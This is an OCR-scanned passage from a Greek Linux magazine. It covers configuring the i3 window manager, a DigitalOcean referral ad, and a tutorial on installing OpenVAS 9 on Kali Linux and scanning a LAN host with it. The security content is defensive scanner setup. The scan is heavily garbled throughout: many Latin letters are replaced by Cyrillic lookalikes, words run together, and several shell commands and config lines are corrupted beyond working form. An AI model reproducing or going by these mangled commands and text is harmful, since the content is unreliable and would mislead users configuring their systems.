σωστή ανάλυση της οθόνης. Κατά περιπτώσεις όµως ίσως θα αποτυγχάνει, ειδικά 
αν δοκιμάζετε τον ἰ3σε εικονικό υπολογιστή. Τότε, καλό είναι να χρησιμοποιούμε то 
εργαλείο хгапаг (χωρίς каша παράμετρο), WOTE αφενός να μάθουμε то όνοµα του 
display καθώς και τις αναλύσεις που υποστηρίζει. Στο УМ µας, το όνοµα του display 
είναι Virtual] και η φυσική ανάλυση της οθόνης είναι 1440x900 εικονοστοιχεία. Έτσι, 
στο configuration file του i3 έχουµε την ακόλουθη γραμμή: 


exec хгапӣг --output Міг&џа11 --тоде 1440x900 


Καθορισμός θέσης και πληροφοριών για την i3bar. Н μπάρα του 13 εμφανίζεται στο 
κάτω µέρος της οθόνης. Αν θέλετε va тпс αλλάξετε θέση, ώστε уа είναι στο πάνω 
µέρος της οθόνης, βρείτε την ενότητα 


раг { 
status_command i3status 
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και προσθέστε οδηγία για τη θέση: 


раг 4 
position top 
status_command i3status 


} 


Είναι νοµίζουµε προφανές ότι στη μπάρα του ІЗ εμφανίζονται οι πληροφορίες που 
επιστρέφει το utility ονόματι 135їќаїиѕ. Οι πληροφορίες που συλλέγει то εν λόγω 
εργαλείο καθορίζονται στο αρχείο /etc/i3status.conf. Ίσως θελήσετε να το τροπο- 
ποιήσετε ελαφρώς, ώστε, T.X., να µην εμφανίζονται πληροφορίες περί ΙΡν6 ή ότι 
άλλο θεωρείτε περιττό. 


Αυτόματη εκκίνηση εφαρμογών. Κατά την εκκίνηση του ІЗ είναι πολύ πιθανόναεπι- 
θυμούμε την εκτέλεση συγκεκριμένων εφαρμογών. Εμείς για παράδειγµα θέλουμε 
να ξεκινά ο επίσημος Nextcloud client, για τον Nextcloud server που έχουµε σε ένα 
Raspberry РІЗ (https://deltahacker.gr/?p=17061). M αυτό και στο config του i3 έχουμε 
την ακόλουθη γραμμή: 


exec /иѕг/ріп/пехіс1оиа 


Εικονίδια εφαρμογών σαν то Мехісіоиа client, εμφανίζονται στα δεξιά της ІЗраг. 


Keyboard layout. Ανά πάσα στιγµή Θέλουμε να αλλάζουμε layout στο πληκτρολόγιο, 
επιλέγοντας μεταξύ Αγγλικών κι Ελληνικών µε то πρώτο να είναι το προεπιλεγµέ- 
νο. Н αλλαγή layout µας βολεύει να γίνεται πατώντας [Alt + Shift], үс αυτό και στο 
configuration file του 13 έχουµε τις ακόλουθες δύο γραμμές: 


exec ѕеїхкртар -layout us,gr 
exec setxkbmap -option 'grp:alt_shift_toggle' 


Προκειμένου να ληφθούν υπόψη τώρα ot ρυθμίσεις περί layout, δεν επανεκκινούμε 
τον ІЗ (µε [9πηο4 + Shift + Β]). Αντίθετα, σε ένα τερματικό γράφουμε διαδοχικά: 


setxkbmap -layout us,gr 
setxkbmap -option 'grp:alt_shift_toggle' 


Μια εναλλακτική για το dmenu 


Χάρη στο атепи, η εκτέλεση εφαρμογών µε GUI επιτυγχάνεται εύκολα µέσα από 
τον ІЗ. Πιθανώς όµως να βρίσκετε κάπως άσχηµη την οριζόντια μπάρα που εμφανί- 
ζεται στο πάνω µέρος της οθόνης, κάθε φορά που πατάτε [5тоа + D]. Ένα εναλλα- 
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κτικό του dmenu εργαλείο είναι то rofi. Στο openSUSE то εγκαθιστούµε πληκτρολο- 
γώντας (µε δικαιώµατα root). Μετά, ανοίγουμε το configuration Не 
του 13 κι αλλάζουμε τη γραμμή 


ріпаѕут $тод+а exec дтепи гип 
ώστε να γίνει όπως η ακόλουθη: 
ріпаѕут $тод+а exec гой -show гип 


Πατήστε тшра то συνδυασμό πλήκτρων [5тоа + D] και δείτε то νέο interface үа την 
εκτέλεση εφαρμογών. То rofi εἶναι λιγότερο διακριτικό σε σύγκριση µε то dmenu, σε 
εμάς όμως αρέσει περισσότερο. Oa рас ενδιέφερε να µας δώσετε το feedback σας 
για τον ἰδιο τον 13. Πώς σας φαίνεται; Έχει πιθανότητες να αποτελέσει το default 
desktop environment για το Linux σας; Αιτιολογήστε, παρακαλούμε, την όποια απά- 
ντησή σας. 


1 110.7 ΘΙΒΙΥΡΝ: по 8.12 2017-06-25 18:42:25 
usersonĝholmavik :~ 


systemd-detect-virt 
virsh 
virt-admin 


t-convert 

t-create-rootfs 

t-host-validate 
install 
lxc-convert 


pki-validate 


virt-xml-validate 


Μπορεί то rofi va είναι λιγότερο διακριτικό апд то dmenu, για εµάς όµως αποτελεί ένα άριστο 
εργαλείο για την εκτέλεση εφαρμογών. 
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πος 
DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts ue δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Арерікп ка! Ασία. 
| вап-тпеап control panel, για απόῆυτο έβεγχο. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της Оідіќа[Осеап. 

Κάντε KAIK στο http://bit.ly/digocean10off 
και κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το µιμρό πϑάνο, 

πάντα με μῆιη στο http: /ΡΙΙ. ly/digocean1 бон, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD ка! ТТВ transfer. 


В Δεν είναι кі άσχημα 


Skill: Intermediate 
Tags: Kali Linux, OpenVAS, vulnerabilities, scanner 


Ανίχνευση αδυναμιων 
µε το καινούργιο 
Ореп\А5 


Προς та τέλη του περασμένου Απριλίου κυκλοφόρησε η πιο πρόσφατη έκδοση 
του Kali, της δημοφιλούς διανομής Linux για digital forensics και penetration 
testing. Μεταξύ των ανανεωμµένων χαρακτηριστικών του Kali Linux είναι η 
συμπερίληψη του ОрепУА5 9 στα repositories της διανομής. 


То Open Vulnerability Assessment System, εν συντομία ОрепУА5, εἶναι µια ευέλικτη 
πλατφόρμα για την ανίχνευση και τη διαχείριση αδυναμιών ασφαλείας σε συστήµα- 
τα. Με то OpenVAS είχαμε ασχοληθεἰτρίακαιπλέον χρόνιαπριν αναπτύσσοντας avad- 
λυτικά ἀρθραστο περιοδικό (ВА. τεύχος 028, https://deltahacker.gr/deltahacker028) 
αλλάκιεκτενέςνἰιαεοτμίοΠαἱ (βλ. deltaCast s02e01, https://deltahacker.gr/?p=10572). 
Αρκετά έχουν αλλάξει από τότε, ὥστε να έχει νόηµα να δούµε ξανά το OpenVAS µε 
µια φρέσκια ματιά. 


Απαραίτητη προετοιμασία 


Όπως είπαμε, θα παίξουμε µε το ОрепуА5 µέσα από το καινούργιο Kali Linux. Από 
την επίσηµη σελίδα download της διανομής (https://www.kali.org/downloads) επι- 
λέξτε την εκδοχή που προτιμάτε και κατεβάστε τη. Εμείς, π.χ. πήραμε εκείνη µε 
το περιβάλλον γραφικών του GNOME, για συστήµατα µε επεξεργαστή αρχιτεκτο- 
νικής χ86-64. Ιδού το σχετικό torrent > https://images.offensive-security.com/ 
kali-linux-2017.1-amd64.torrent κι ew εἰναι και то link για direct downloading > 
http://cdimage.kali.org/kali-2017.1/kali-linux-2017.1-amd64.iso. Σε κάθε περίπτωση, 
μετά τη λήψη θα έχετε το ISO image του Кай Linux 20171. Αν δεν σκοπεύετε να то 
εγκαταστήσετε σε εικονικό αλλά σε φυσικό υπολογιστή, τότε προτείνουμε уа пе- 
ράσετε то ISO σε USB stick (https://deltahacker.gr/iso2usb) και να ξεκινήσετε τον 
υπολογιστή απ αυτό. 


Η περιγραφή της διαδικασίας εγκατάστασης του Кай ξεφεύγει απὀ τους σκοπούς 
του παρόντος. Σημειώνουμε μόνο ότι µετά το πέρας της -και σίγουρα πριν στρέ- 
poupe την προσοχή µας στο OpenVAS 9-, кало είναι να φρεσκάρουµε та repositories 
της διανομής και µετά να εφαρμόσουμε τις όποιες διαθέσιµες αναβαθμίσεις: 
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Ανίχνευση αδυναμιών µε то καινούργιο ОрепуА5 


гоої@Ка11:-# арї-р 
root@kali:~# apt 


Αναλόγως του χρόνου που έχει μεσολαβήσει από το προηγούμενο upgrade, η διαδι- 
κασία ενδέχεται να ολοκληρωθεί σε δευτερόλεπτα έως αρκετά λεπτά. 


Applications = Places т [7] Terminal ~ ѕип 13:08 


root@kali: ~ 


File Edit View Search Terminal Help 
е 
:-# apt-get upgrade 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

Calculating upgrade... Done 

The following packages have been kept back: 
jsql kali-linux-full linux-image-amd64 

The following packages will be upgraded: 
aapt android-framework-res android-libaapt android-libandroidfw android-libbacktrace 
android-libbase android-libcutils android-liblog android-libutils android-libziparchive 
armitage cpp-6 exploitdb file g++-6 gcc-6 gcc-6-base gnome-orca hashcat-utils hydra 
hydra-gtk iso-codes kali-desktop-common kali-desktop-gnome kali-desktop-live kali-linux 
kali-menu libasan3 11іраїотіс1 110сс1-0 libcilkrts5 libgcc-6-dev 11расс1 libgfortran3 
libgomp1 libitml 1161ѕапе libmagic-dev libmagic-mgc libmagicl libmpx2 libnss-myhostname 
libobjc-6-dev libobjc4 libpam-systemd 1іраиайтатһ0 libsbc1 libserf-1-1 libstdc++-6-dev 
libstdc++6 libsystemd@ libtsan@ libubsanO libudev1 libzmq5 metasploit-framework mimikatz 
ntp openjdk-8-jdk openjdk-8-jdk-headless openjdk-8-jre openjdk-8-jre-headless python-cairo 
python-impacket rainbowcrack smbmap ssl-cert systemd systemd-sysv udev x11-common 
xserver-xorg xserver-xorg-input-all xserver-xorg-video-all 

74 upgraded, 0 newly installed, 0 to remove and 3 not upgraded. 

Need to get 213 MB of archives. 

After this operation, 659 kB of additional disk space will be used. 

Do you want to continue? [Y/n] β 


Δεν είναι και λίγες οι διαθέσιμες αναβαθμίσεις για την εγκατάσταση тоо Kali που τρέχουμε. Μετά την ολοκλήρωση της 
διαδικασίας, προσέξτε για την περίπτωση που έχει αναβαθμιστεί κι ο πυρήνας του λειτουργικού. Αν πράγματι έχει, κάντε µια 
επανεκκίνηση. 


Εγκατάσταση ОрепУА5 9 και σύνδεση στο web panel 


Όπως αναφέραμε ήδη, η καινούργια έκδοση του ОрепуА5 βρίσκεται στα αποθετήρια 
λογισμικού (software repositories) του Kali Linux 29171. Ma Tnv εγκατάσταση, λοιπόν, 
αρκεί va πληκτρολογήσουμε: 


гоої@Ка11:-~# apt- install орепуав 
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Applications ~ Places» [5] Terminal ~ mán maí 15, 


root@kali: ~ 

File Edit View Search Terminal Help 

root@kali:-~# 

root@kali:-# apt-get install openvas 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following additional packages will be installed: 
doc-base fonts-texgyre gnutls-bin greenbone-security-assistant greenbone-security-assistant-common 
libfile-homedir-perl libfile-which-perl libgnutls-dane0 11ірһігей150.13 libmicrohttpd12 libopenvas9 
libunbound2 libuuid-perl libyaml-tiny-perl openvas-cli openvas-manager орепуаѕ -тападег- соттоп 
openvas-scanner preview-latex-style prosper рѕ2ерѕ redis-server redis-tools tex-gyre texlive-extra-utils 
texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-extra 
texlive-generic-recommended texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended 
texlive-latex-recommended-doc texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc 
tipa 

Suggested packages: 
rarian-compat openvas-client рпѕсап strobe ruby-redis chktex dvidvi dvipng fragmaster lacheck latexdiff 
latexmk purifyeps xindy psutils libspreadsheet-parseexcel-perl dot2tex prerex ruby-tcltk | libtcltk-ruby 

The following NEW packages will be installed: 
doc-base fonts-texgyre gnutls-bin greenbone-security-assistant greenbone-security-assistant-common 
libfile-homedir-perl libfile-which-perl libgnutls-dane0 libhiredis0.13 libmicrohttpd12 libopenvas9 
libunbound2 libuuid-perl libyaml-tiny-perl орепуаѕ openvas-cli openvas-manager орепуаѕ -manager -common 
openvas-scanner preview-latex-style prosper рѕ2ерѕ redis-server redis-tools tex-gyre texlive-extra-utils 
texlive-font-utils texlive-fonts-recommended texlive-fonts-recommended-doc texlive-generic-extra 
texlive-generic-recommended texlive-latex-extra texlive-latex-extra-doc texlive-latex-recommended 
texlive-latex-recommended-doc texlive-pictures texlive-pictures-doc texlive-pstricks texlive-pstricks-doc 
tipa 

0 upgraded, 40 newly installed, © to remove and 0 not upgraded. 

| Need to get 872 MB of archives. 
After this operation, 1.220 MB of additional disk space will be used. 
Do you want to continue? [Y/n] 


- 
м 
Е 
[8 


Το ОрепУА5 χρειάζεται αρκετά άλλα πακέτα για να λειτουργήσει σωστά. Για παράδειγµα, το συνολικό 
μέγεθος των πακέτων για τη δική µας εγκατάσταση έφτανε τα 872МВ. Όλες αυτές τις εξαρτήσεις 
(dependencies) τις τακτοποιεί то арі. Από τη µεριά µας δεν έχουµε пара να δεχτούμε την πρότασή 
του, για Τα πακέτα που πρέπει να εγκατασταθούν. 


Όταν η διαδικασία της εγκατάστασης ολοκληρωθεί, πληκτρολογούμε: 
root@kali:~# 


Το εργαλείο openvas-setup a) κατεβάζει µια υπερπληθώρα από Network Vulnerability 
Tests (ΝνΤ9), ре βάση τα οποία η πλατφόρμα είναι σε θέση να αναγνωρίζει αδυναμί- 
ες, В) δημιουργεί ένα χρήστη µε δικαιώµατα διαχειριστή (үа то ОрепуА$, όχι yta TO 
Kali), ενώ ү) ξεκινά και τις υπηρεσίες (services) που χρειάζεται το OpenVAS προκει- 
μένου να λειτουργεί σωστά. Έχετε υπόψη ότι «ειδικά: την πρώτη φορά που θατρέ- 
ἕξετε то орепуаѕ-ѕеїир, Ва χρειαστεί αρκετό χρόνογιανα ολοκληρώσειτις εργασίες 
του. Γενικά, ο χρόνος αυτός είναι πρωτίστως ανάλογος της ταχύτητας της ιντερνε- 
τικής σας σύνδεσης. Δευτερευόντως, εξαρτάται από τους πόρους του εικονικού/ 
φυσικού υπολογιστή µε то Kali. 
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root@kali: ~ 
File Edit View Search Terminal Help 


If you have any questions, please use the OpenVAS mailing lists 
or the OpenVAS IRC chat. See http://www.openvas.org/ for details. 


By using this service you agree to our terms and conditions. 
Only one sync per time, otherwise the source ip will be blocked. 


receiving incremental file list 


./ 
COPYING 


1,493 100% 1.42MB/s :00:00 (xfr#l, 
COPYING.asc 
181 100% 176.76kB/s :00: (xfr#2, to-chk=66/69) 
nvdcve-2.0-2002.xml 
19,563,617 100% 801.99kB/s :00: (xfr#3, to-chk=65/69) 
nvdcve-2.0-2002.xml.asc 
100% 1.46kB/s 106: (xfr#4, %о-сһК-64/69) 
«χπὶ 
100% 796.17КВ/5 :00:06 (хҒгЯ5, %о-сһК-63/69) 
.xml.asc 
100% 0.28kB/s :00: (xfr#6, to-chk=62/69) 
«χπὶ 
11,819,416 100% 765.92ΚΒ/5 1:00: (xfr#7, %о-сһК-61/69) 
nvdcve-2.0-2004.xml.asc 
181 100% 1.96kB/s 106: (xfr#8, %о-сһК-60/69) 
пудсуе-2.0-2005.хт1 
18,206,789 100% 797.17КВ/5 :00:22 (хҒгЯ9, %о-сһК-59/69) 
пусісуе-2.0-2005.хт1.а5с 
181 100% 0.20ΚΒ/5 106: (хҒгЯ10, %о-сһК-58/69) 
пусісуе-2.0-2006. χπὶ 
28,291,389 100% 779.80КВ/5 :00: (хҒгй11, %0-сһК-57/69) 
«Χπὶ.85ς 
100% 9.69КВ/5 :00: (хҒгй12, %о-сһК-56/69) 
«χπὶ 
11,042,816 42% 800.19КВ/5 


Την πρώτη φορά που θα то τρέξουμε, то орепуав-зейир θα χρειαστεί αρκετό χρόνο πριν ολοκληρώσει тіс 

εργασίες του. 
Αφού το орепуаѕ-ѕеїир τελειώσει τις δουλειές του, µας δείχνει το password που 
ἐχει αντιστοιχίσει στο χρήστη admin. Το συγκεκριµένο συνθηματικό το χρειαζόμα- 
στε προκειµένου να συνδεθούµε στο мер panel της πλατφόρμας. 


root@kali: ~ 


Edit View Search Terminal Help 
198 100% 705.86КВ/5 :00:02 (х?г#21, %0-сһК-14/36) 


.66КВ/5 :00:00 (хҒгЯ22, %о-сһК-13/36) 
dfn-cert-2013.xml 
1,622,943 100% 695.74kB/s :00:02 (xfr#23, to-chk=12/36) 
«39ΚΒ/5 :00:00 (χ{γ824, %0-сһК-11/36) 
.61КВ/5 :00:01 (х#г#25, %о-сһК-10/36) 
.20КВ/5 :00:00 (χ{γ826, %о-сһК-9/36) 
.68КВ/5 :00:03 (χ{γ827, %о-сһК-8/36) 
.69КВ/5 :00:00 (xfr#28, %о-сһК-7/36) 
.22КВ/5 :00:03 (Χ{Γή29, %о-сһК-6/36) 
.47КВ/5 :00:00 (хҒгЯ30, %0-сһК-5/36) 
dfn-cert-2017.xml 
1,118,472 100% 635.03КВ/5 :00:01 (хҒгйЗ1, %0-сһК-4/36) 
dfn-cert-2017.xml.asc 
181 100% 0.28kB/s :00:00 (xfr#32, to-chk=3/36) 
shalsums 
2,002 100% 3.11kB/s :00:00 (xfr#33, to-chk=2/36) 
0.02kB/s 0:00:00 (xfr#34, to-chk=1/36) 


0.28kB/s 0:00:00 (xfr#35, to-chk=0/36) 


sent 719 bytes received 35,588,033 bytes 799,747.24 bytes/sec 
total size is 35,576,994 speedup is 1.00 

/usr/sbin/openvasmd 

User created with passwo ab71ff6a-48b9-4e41-b297 -7405207879 
гоо“ака1і:-% (| 


Δεν το λες κι αδύναμο то password που έχει βάλει στο λογαριασμό του χρήστη admin, то орепуаѕ-ѕеіир. 
Σημειώστε το κάπου γιατί σε λίγο θα то χρειαστείτε - αλλά έχετε κι υπόψη ότι µπορείτε να ορίσετε то δικό 
σας password. 
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Av το αυτόματα δημιουργημένο password σάς φαίνεται περιττά περίπλοκο -ή τέλος 
πάντων θέλετε να ορίσετε το δικό сас-, αλλάξτε το µε το εργαλείο орепуаѕта: 


root@kali:~# 


Όπως είπαμε πριν λίγο, το openvas-setup ξεκινά συγκεκριμένες υπηρεσίες που si- 
ναι απαραίτητες για τη λειτουργία της πλατφόρμας. Οι υπηρεσίες αυτές είναι οι 
ακόλουθες τρεις: 


“ орепуав-тападег, υπηρεσία διαχείρισης των user configurations καθώς και 
των αποτελεσμάτων που παράγουν οι σαρώσεις, πρακτικά στέκεται ανάμεσα 
σε χρήστες και ѕсаппегѕ 


“ орепуав-<саппег, η μηχανή που πραγματοποιεί τα network vulnerability tests 


“ дгеепропе-ѕесигіїу-аѕѕіѕїапї, παρέχει πρόσβαση στον бгеепропе Security 
Assistant, éva εύχρηστο мер panel για то ОрепуА5 


Αν µε το εργαλείο зузіетсі ζητήσετε να δείτε το status καθεμιάς εκ των προανα- 
φερθέντων υπηρεσιών, θα διαπιστώσετε ότι αν και είναι ενεργή (active ἡ running) 
την ἴδια στιγµή είναι απενεργοποιηµένη (disabled). Δείτε το ακόλουθο screenshot. 


root@kali: ~ 


File Edit View Search Terminal Help 
1:-# 
ασ systemctl --по-радег status орепуа5-пападег. ѕегуісе 
-пападег.<егуісе - Open Vulnerability Assessment System Manager Daemon 
Loaded: loaded (/lib/systemd/system/openvas-manager.service; disabled; vendor preset: disabled) 
Active: since Mon 2017-05-15 15:43:04 GMT; 37min ago 
Docs: man:openvasmd(8) 
http ://www.openvas .org/ 
Process: 1182 ExecStart=/usr/sbin/openvasmd --listen=127.0.0.1 --port=9390 --database=/var/lib/ope 
nvas/mgr/tasks.db (code=exited, status=0/SUCCESS) 
Main PID: 1192 (openvasmd) 
Tasks: 1 (limit: 19660) 
CGroup: /system.slice/openvas-manager.service 
L-1192 openvasmd 


maí 15 15:43:00 kali systemd[1]: Starting Open Vulnerability Assessment System Manager Daemon... 
maí 15 15:43:00 kali systemd[1]: openvas-manager.service: PID file /var/run/openvasmd.pid no..ectory 
maí 15 15:43:04 kali systemd[1]: Started Open Vulnerability Assessment System Manager Daemon. 

Hint: Some lines were ellipsized, use -l to show in full. 

root@kali:~# [] 


Το openvas-setup φροντίζει και ξεκινά тіс υπηρεσίες που то OpenVAS χρειάζεται, δεν тіс ενεργοποιεί όμως 
(στην εικόνα φαίνεται µία апд тіс τρεις υπηρεσίες). 


Περισσότερα για το ѕуѕїета και τη διαχείριση υπηρεσιών µπορείτε να διαβάσετε 
στο https://deltahacker.gr/systemd-and-logging. Γενικά, δεν υπάρχει λόγος ώστε οι 
υπηρεσίες орепуаѕ-гтападег, орепуаѕ-ѕсаппег και дгеепропе-ѕесигіїу-аѕѕіѕїапі να 
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είναι ενεργοποιηµένες - εκτός кі αν πρόκειται να δουλεύετε µε то OpenVAS τακτι- 
κά. Για την ευκολία µας, πάντως, µετά апо κάθε (επαν)εκκίνηση του Кай μπορούμε 
να ξεκινάμε «χειροκίνητα τις τρεις αυτές υπηρεσίες µε μία μόνο εντολή: 


гоо@Ка11:-# орепуа5-5%аг% 


Πα τη σύνδεση στο мер panel του ОрепУА5, από έναν мер browser αρκεί να επισκε- 
фтооре τη διεύθυνση https://127.0.0.1:9392. Την πρώτη фора θα λάβουμε ειδοποίη- 
ση για self-signed πιστοποιητικό, δημιουργούμε όµως µια εξαίρεση στον browser και 
συνεχίζουμε. 


Μπορούμε τώρα να συνδεθούµε στο мер panel -- και συγκεκριµένα στο λογαρια- 
OÓ του χρήστη µε username то admin. Το password είναι είτε αυτό που ετοίμα- 
σε για εμάς то openvas-setup, είτε εκείνο που ορίσαµε µε την εντολή орепуазта. 
Αφού λοιπόν συνδεθούμε, σίγουρα θα θέλουμε να κάνουμε το πρώτο µας scan για 
vulnerabilities. Πώς ακριβώς δουλεύουμε; 


Ρή та! 16, 07:15 


Insecure Connection - Mozilla Firefox 


ге | [Q Search пев 5 4 8 


ost Міѕќеа т β[βΟπεποίνε Security Ҹ Кай Linux % Kali Docs % Кай Tools ЕЙҒхріой-ОВ Ж.Аігсгаск-па 


 Үошг connection is пої secure 


The owner of 127.0.0.1 has configured their website improperly. To protect 
your information from being stolen, Firefox has not connected to this website. 


Learn more... 


127.0.0.1:9392 uses an invalid security certificate. 

The certificate is not trusted because the issuer certificate is unknown. 
The server might not be sending the appropriate intermediate certificates. 
An additional root certificate may need to be imported. 


The certificate is only valid for kali.colder.is 


Error code: SEC-ERROR-UNKNOWN-ISSUER 


Add Exception.) 


Το πιστοποιητικό για то web panel του OpenVAS (Greenbone Security Assistant) είναι self-signed, γι’ αυτό 
κι ο Firefox διαμαρτύρεται. Δημιουργώντας µια εξαίρεση δεν βλέπουμε ξανά ανάλογες ειδοποιήσεις - 
τουλάχιστον όχι για το συγκεκριµένο site. 
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Κυνήγι αδυναμιών µε το OpenVAS 9 


О καλύτερος τρόπος προκειµένου να μάθουμε то ОрепуА5 αλλά και να εκτιµήσου- 
ре тіс δυνατότητες και τους περιορισμούς του, είναι να δούμε, αναλυτικά και βήμα 
προς βήμα, пос σκανάρουµε éva σύστηµα για αδυναμίες. Σε γενικές γραμμές η 
πρώτη µας δουλειά εἰναι να ορίσουμε éva target, μ' άλλα λόγια ένα ἡ περισσότερα 
μηχανήματα που θέλουμε να σκανάρουµε. Μετά τον ορισμό target ορίζουµε κι éva 
task, το οποίο χρησιμοποιεί το προαναφερθέν target προκειµένου να τρέξει µια σει- 
ра апо network vulnerability tests. 


To OpenVAS κάλλιστα µπορεί και σκανάρει απομακρυσμένα hosts στο Internet, όσο 
και τοπικά hosts εντός του LAN. Καλό είναι πάντως να µη σκανάρουµε αποµακρυ- 
σµένα hosts, εκτός κι αν έχουµε πάρει σχετική άδεια από τους υπευθύνους. Ας δού- 
µε λοιπόν πως ψάχνουμε για αδυναμίες σε ένα host µέσα апо то LAN, ото οποίο Bpi- 
σκεται και το Ка! Linux µας. Ένας γρήγορος κι αξιόπιστος τρόπος για να βρίσκουμε 
τις διευθύνσεις ІР όλων των hosts που είναι ενεργά εντός του | ΑΝ, εἶναι µε χρήση 
του εργαλείου пеїаіѕсомег: 


гоої@Ка11:~# пеёаіѕсомег -P -r 192.168.193.0/24 


root@kali: ~ 
File Edit View Search Terminal Help 
:~# 
:-# netdiscover -P -r 192.168.193.0/24 


At MAC Address MAC Vendor / Hostname 


192.168.193.1 00:50:5 - Unknown vendor 
192.168.193.235 00:0c:29 Unknown vendor 
192.168.193.242 00:0с:29:71:71: Unknown vendor 
192.168.193.254 00:0c:29:8b:ff:e8 Unknown vendor 


-- Active scan completed, 4 Hosts found. 


:~# 
:-# || 


Ανίχνευση ενεργών hosts εντός του τοπικού δικτύου που βρίσκεται το Kali Linux. 
Τα μηχανήματα του LAN παίρνουν διευθύνσεις ΙΡ της µορφής 192.168.193.*. 


Апо та μηχανήματα που εντόπισε το πεϊαίδοονεί, ας σκανάρουµε εκείνο µε ΙΡ то 
192.168.193.235 (τρέχει! Linux). Αν στο σημείο αυτό θέλουμε να κάνουμε κι éva reverse 
DNS lookup, әсте να βρούμε то FQDN (Fully Qualified Domain Мате) του μηχανήμα- 
τος-στόχου, αρκεί να πληκτρολογήσουμε: 


гоо@Ка11:-# dig -x 192.168.193.235 +short 
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root@kali: ~ 
File Edit — Search Terminal Help 


ὅν dig -x 192.168.193.235 +short 
olafsvik.colder.is. 


П 


Παράδειγμα reverse DNS lookup µε то εργαλείο dig. Στο τοπικό µας δίκτυο, το FQDN του 
192.168.193.235 είναι olafsvik.colder.is. Παρεμπιπτόντως, то λειτουργικό σύστημα тоо host 
είναι κάποια διανοµή του Linux. 


Στρέφουµε την προσοχή µας ото мер panel του ΟρεΠΝΑς. Φτιάχνουμε éva νέο target 
επιλέγοντας Configuration / Targets. Στη σελίδα που εμφανίζεται κάνουμε κλικ στο 
γαλάζιο εικονίδιο µε το λευκό αστερίσκο, πάνω αριστερά. Παρουσιάζεται τότε ένα 
pop-up µε όνομα New Target. Δείτε та δύο screenshots που ακολουθούν, διαβάστε 
καιτις αντίστοιχες περιγραφές. 


Greenbone Security Assistant - Mozilla Firefox 


δ Greenbone Security A... х \ 4 


є) ое 127.0.0.1. 
Сгеепропе Refresh every 30 сес, -- 
Шулы APADEA DARA AAAA ARAA AAA ΡΣ. ор 
Dashboard Scans Assets Secinto Configuration Extras Administration 
аг ων Filter: аба 
РРА пин5-«10 irste] 50 аше 
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© | 
O roet (0 of 0) 
Name olafsvik в! 
Ме Де ΄.. TEE νυ 


| © manual 192.168.193.235 | 
(Арріез тег: roms=10 first=1 sørt=name) | | 
Hosts From file Browse.. | No file selected. | 


Exclude Hosts 


Reverse Lookup Only Yes ϐ Νο | 
Reverse Lookup Unify Yes ϐ Νο 1 
Роп Ш! OpenVAS Default М | 
Alive Test Scan Config Default М ! 
Credentials for authenticated checks 1 
SSH - ~ |опроп |22 Η 


SMB - | 
ESXi - ” ` 


33 


VHA@KER 


Greenbone Security Assistant - Mozilla Firefox 
Ф Greenbone Security A.. х \ 
€)©@ https://127.0.0.1: 


Refresh every 30 Sec. ” 


Dashboard Assets Secinfo Configuration Extras Administration 


2 


P orget (1 of 1) 
1-10Ғ1 
ме 2 ее 2 (өеніе | (сеннен ез» БІ іш |е | 


(this is а single-host target) 192168.193:235 1 васе 


УАрріу to раде contents ғ alt 


(Applied filter: rows=10 first=1 sort=name) 1-1 


Ιδού οι στόχοι που έχουµε καθορίσει. Εντάξει, προς το παρόν έχουµε μόνον évav. 


Μετά τον ορισμό target ἔχουμε να ορίσουµε κι ένα task поо θα αφορά oTo target. Στο 
web panel του ΟρεΠΝΑς επιλέγουμε Scans / Tasks. Εμφανίζεται éva πληροφοριακό 
pop-up, то οποίο παραμένει για δέκα δευτερόλεπτα (δεν χρειάζεται φυσικά να TE- 
ριµένουμε, πατάμε ото [х] πάνω δεξιά και το κλείνουμε). Па άλλη µια φορά πατάμε 
στο εικονίδιο µε τον αστερίσκο, πάνω αριστερά. Δείτε τα επόμενα screenshots. 


Greenbone Security Assistant - Mozilla Firefox 
4 Greenbone Security A.. х \ Ф 
Є) оа 127.0.0.1: 


Мате οἰαίονίκ 


Fr A Comment | security scan for olafsvik 
W / Tasks (0 of 0) 
ScanTargets | olafsvik 
Alerts 


Schedule 


Addresultsto @ yes O по 


ЖИ 7 -.... 


/ Min QoD 
. 
7 
Alterable Task © yes Ф по 


/ ” ) 
“” A Pa Auto Delete @ Do not automatically delete reports 
PPA “4, Ж Reports 


Automatically delete oldest reports but always keep пемезі/ 5 Е reports 


Πα τη νέα µας εργασία πληκτρολογούμε éva χαρακτηριστικό буора και µια TE- 
ριγραφή (1). Στο πεδίο 5сап Тагдеїѕ επιλέγουμε το στόχο ή τους στόχους στους 
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οποίους αφορά η εργασία (2). Προς το παρόν διαθέτουμε έναν µόνο στόχο -- και 
ίσιο της παρουσίασής µας τον έχουµε ονομάσει olafsvik. Πα όλες τις άλλες 
ос αφήνουμε τις προκαθορισµένες τιµές. Σκρολάρουµε λίγο προς та 


Greenbone Security Assistant - Mozilla Firefox 
4 Greenbone Security A.. х \ + 


(Є) оа п 127.0.0.1: 


nan New Task f 

5) Ayoma Өз Ον Б Δείτε λίγο τις тірес 

са σὺ св: που επιδέχονται οι πα- 
λος ικανών ράμετροι Зсаппег και 


Automatically delete oldest reports but always keep newest| CB 


сес» C Scan Config. Па αρχή, 
а E --.. Ы πάντως, µπορείτε να 


Network Source Interface 


А 


нетен (анн а αφήσετε τις προεπι- 
ашаар λεγμένες. Н νέα εργα- 

σία δημιουργείται µε 

se éva κλικ στο κουμπί 
РРР Сгеаїе, κάτω δεξιά. 


scanned hosts 


Greenbone Security Assistant - Mozilla Firefox 
49. Greenbone Security A.. х \ ж 
€) 0а https://127.0.0.1: с [[α Search 
Dashboard Assets Secinfo Configuration Extras Administration 


Filter: 


"= (1 of 1) 


Tasks by Severity Class (Total: 1) ~ Tasks with most High results per host |- Tasks by status (Total: 1) 
E New 


No Tasks with High severity found 


To πρώτο μας task, то 
οποίο αφορά σε target 
µε έναν µόνο host, gí- 


πω селе --- πο σον о я 


οσο ΕΠ κινήσει αρκεί ένα κλικ 
керегелері шті Ξ στο πράσινο κουμπάκι 


play" στα δεξιά της 
γραμμής. 


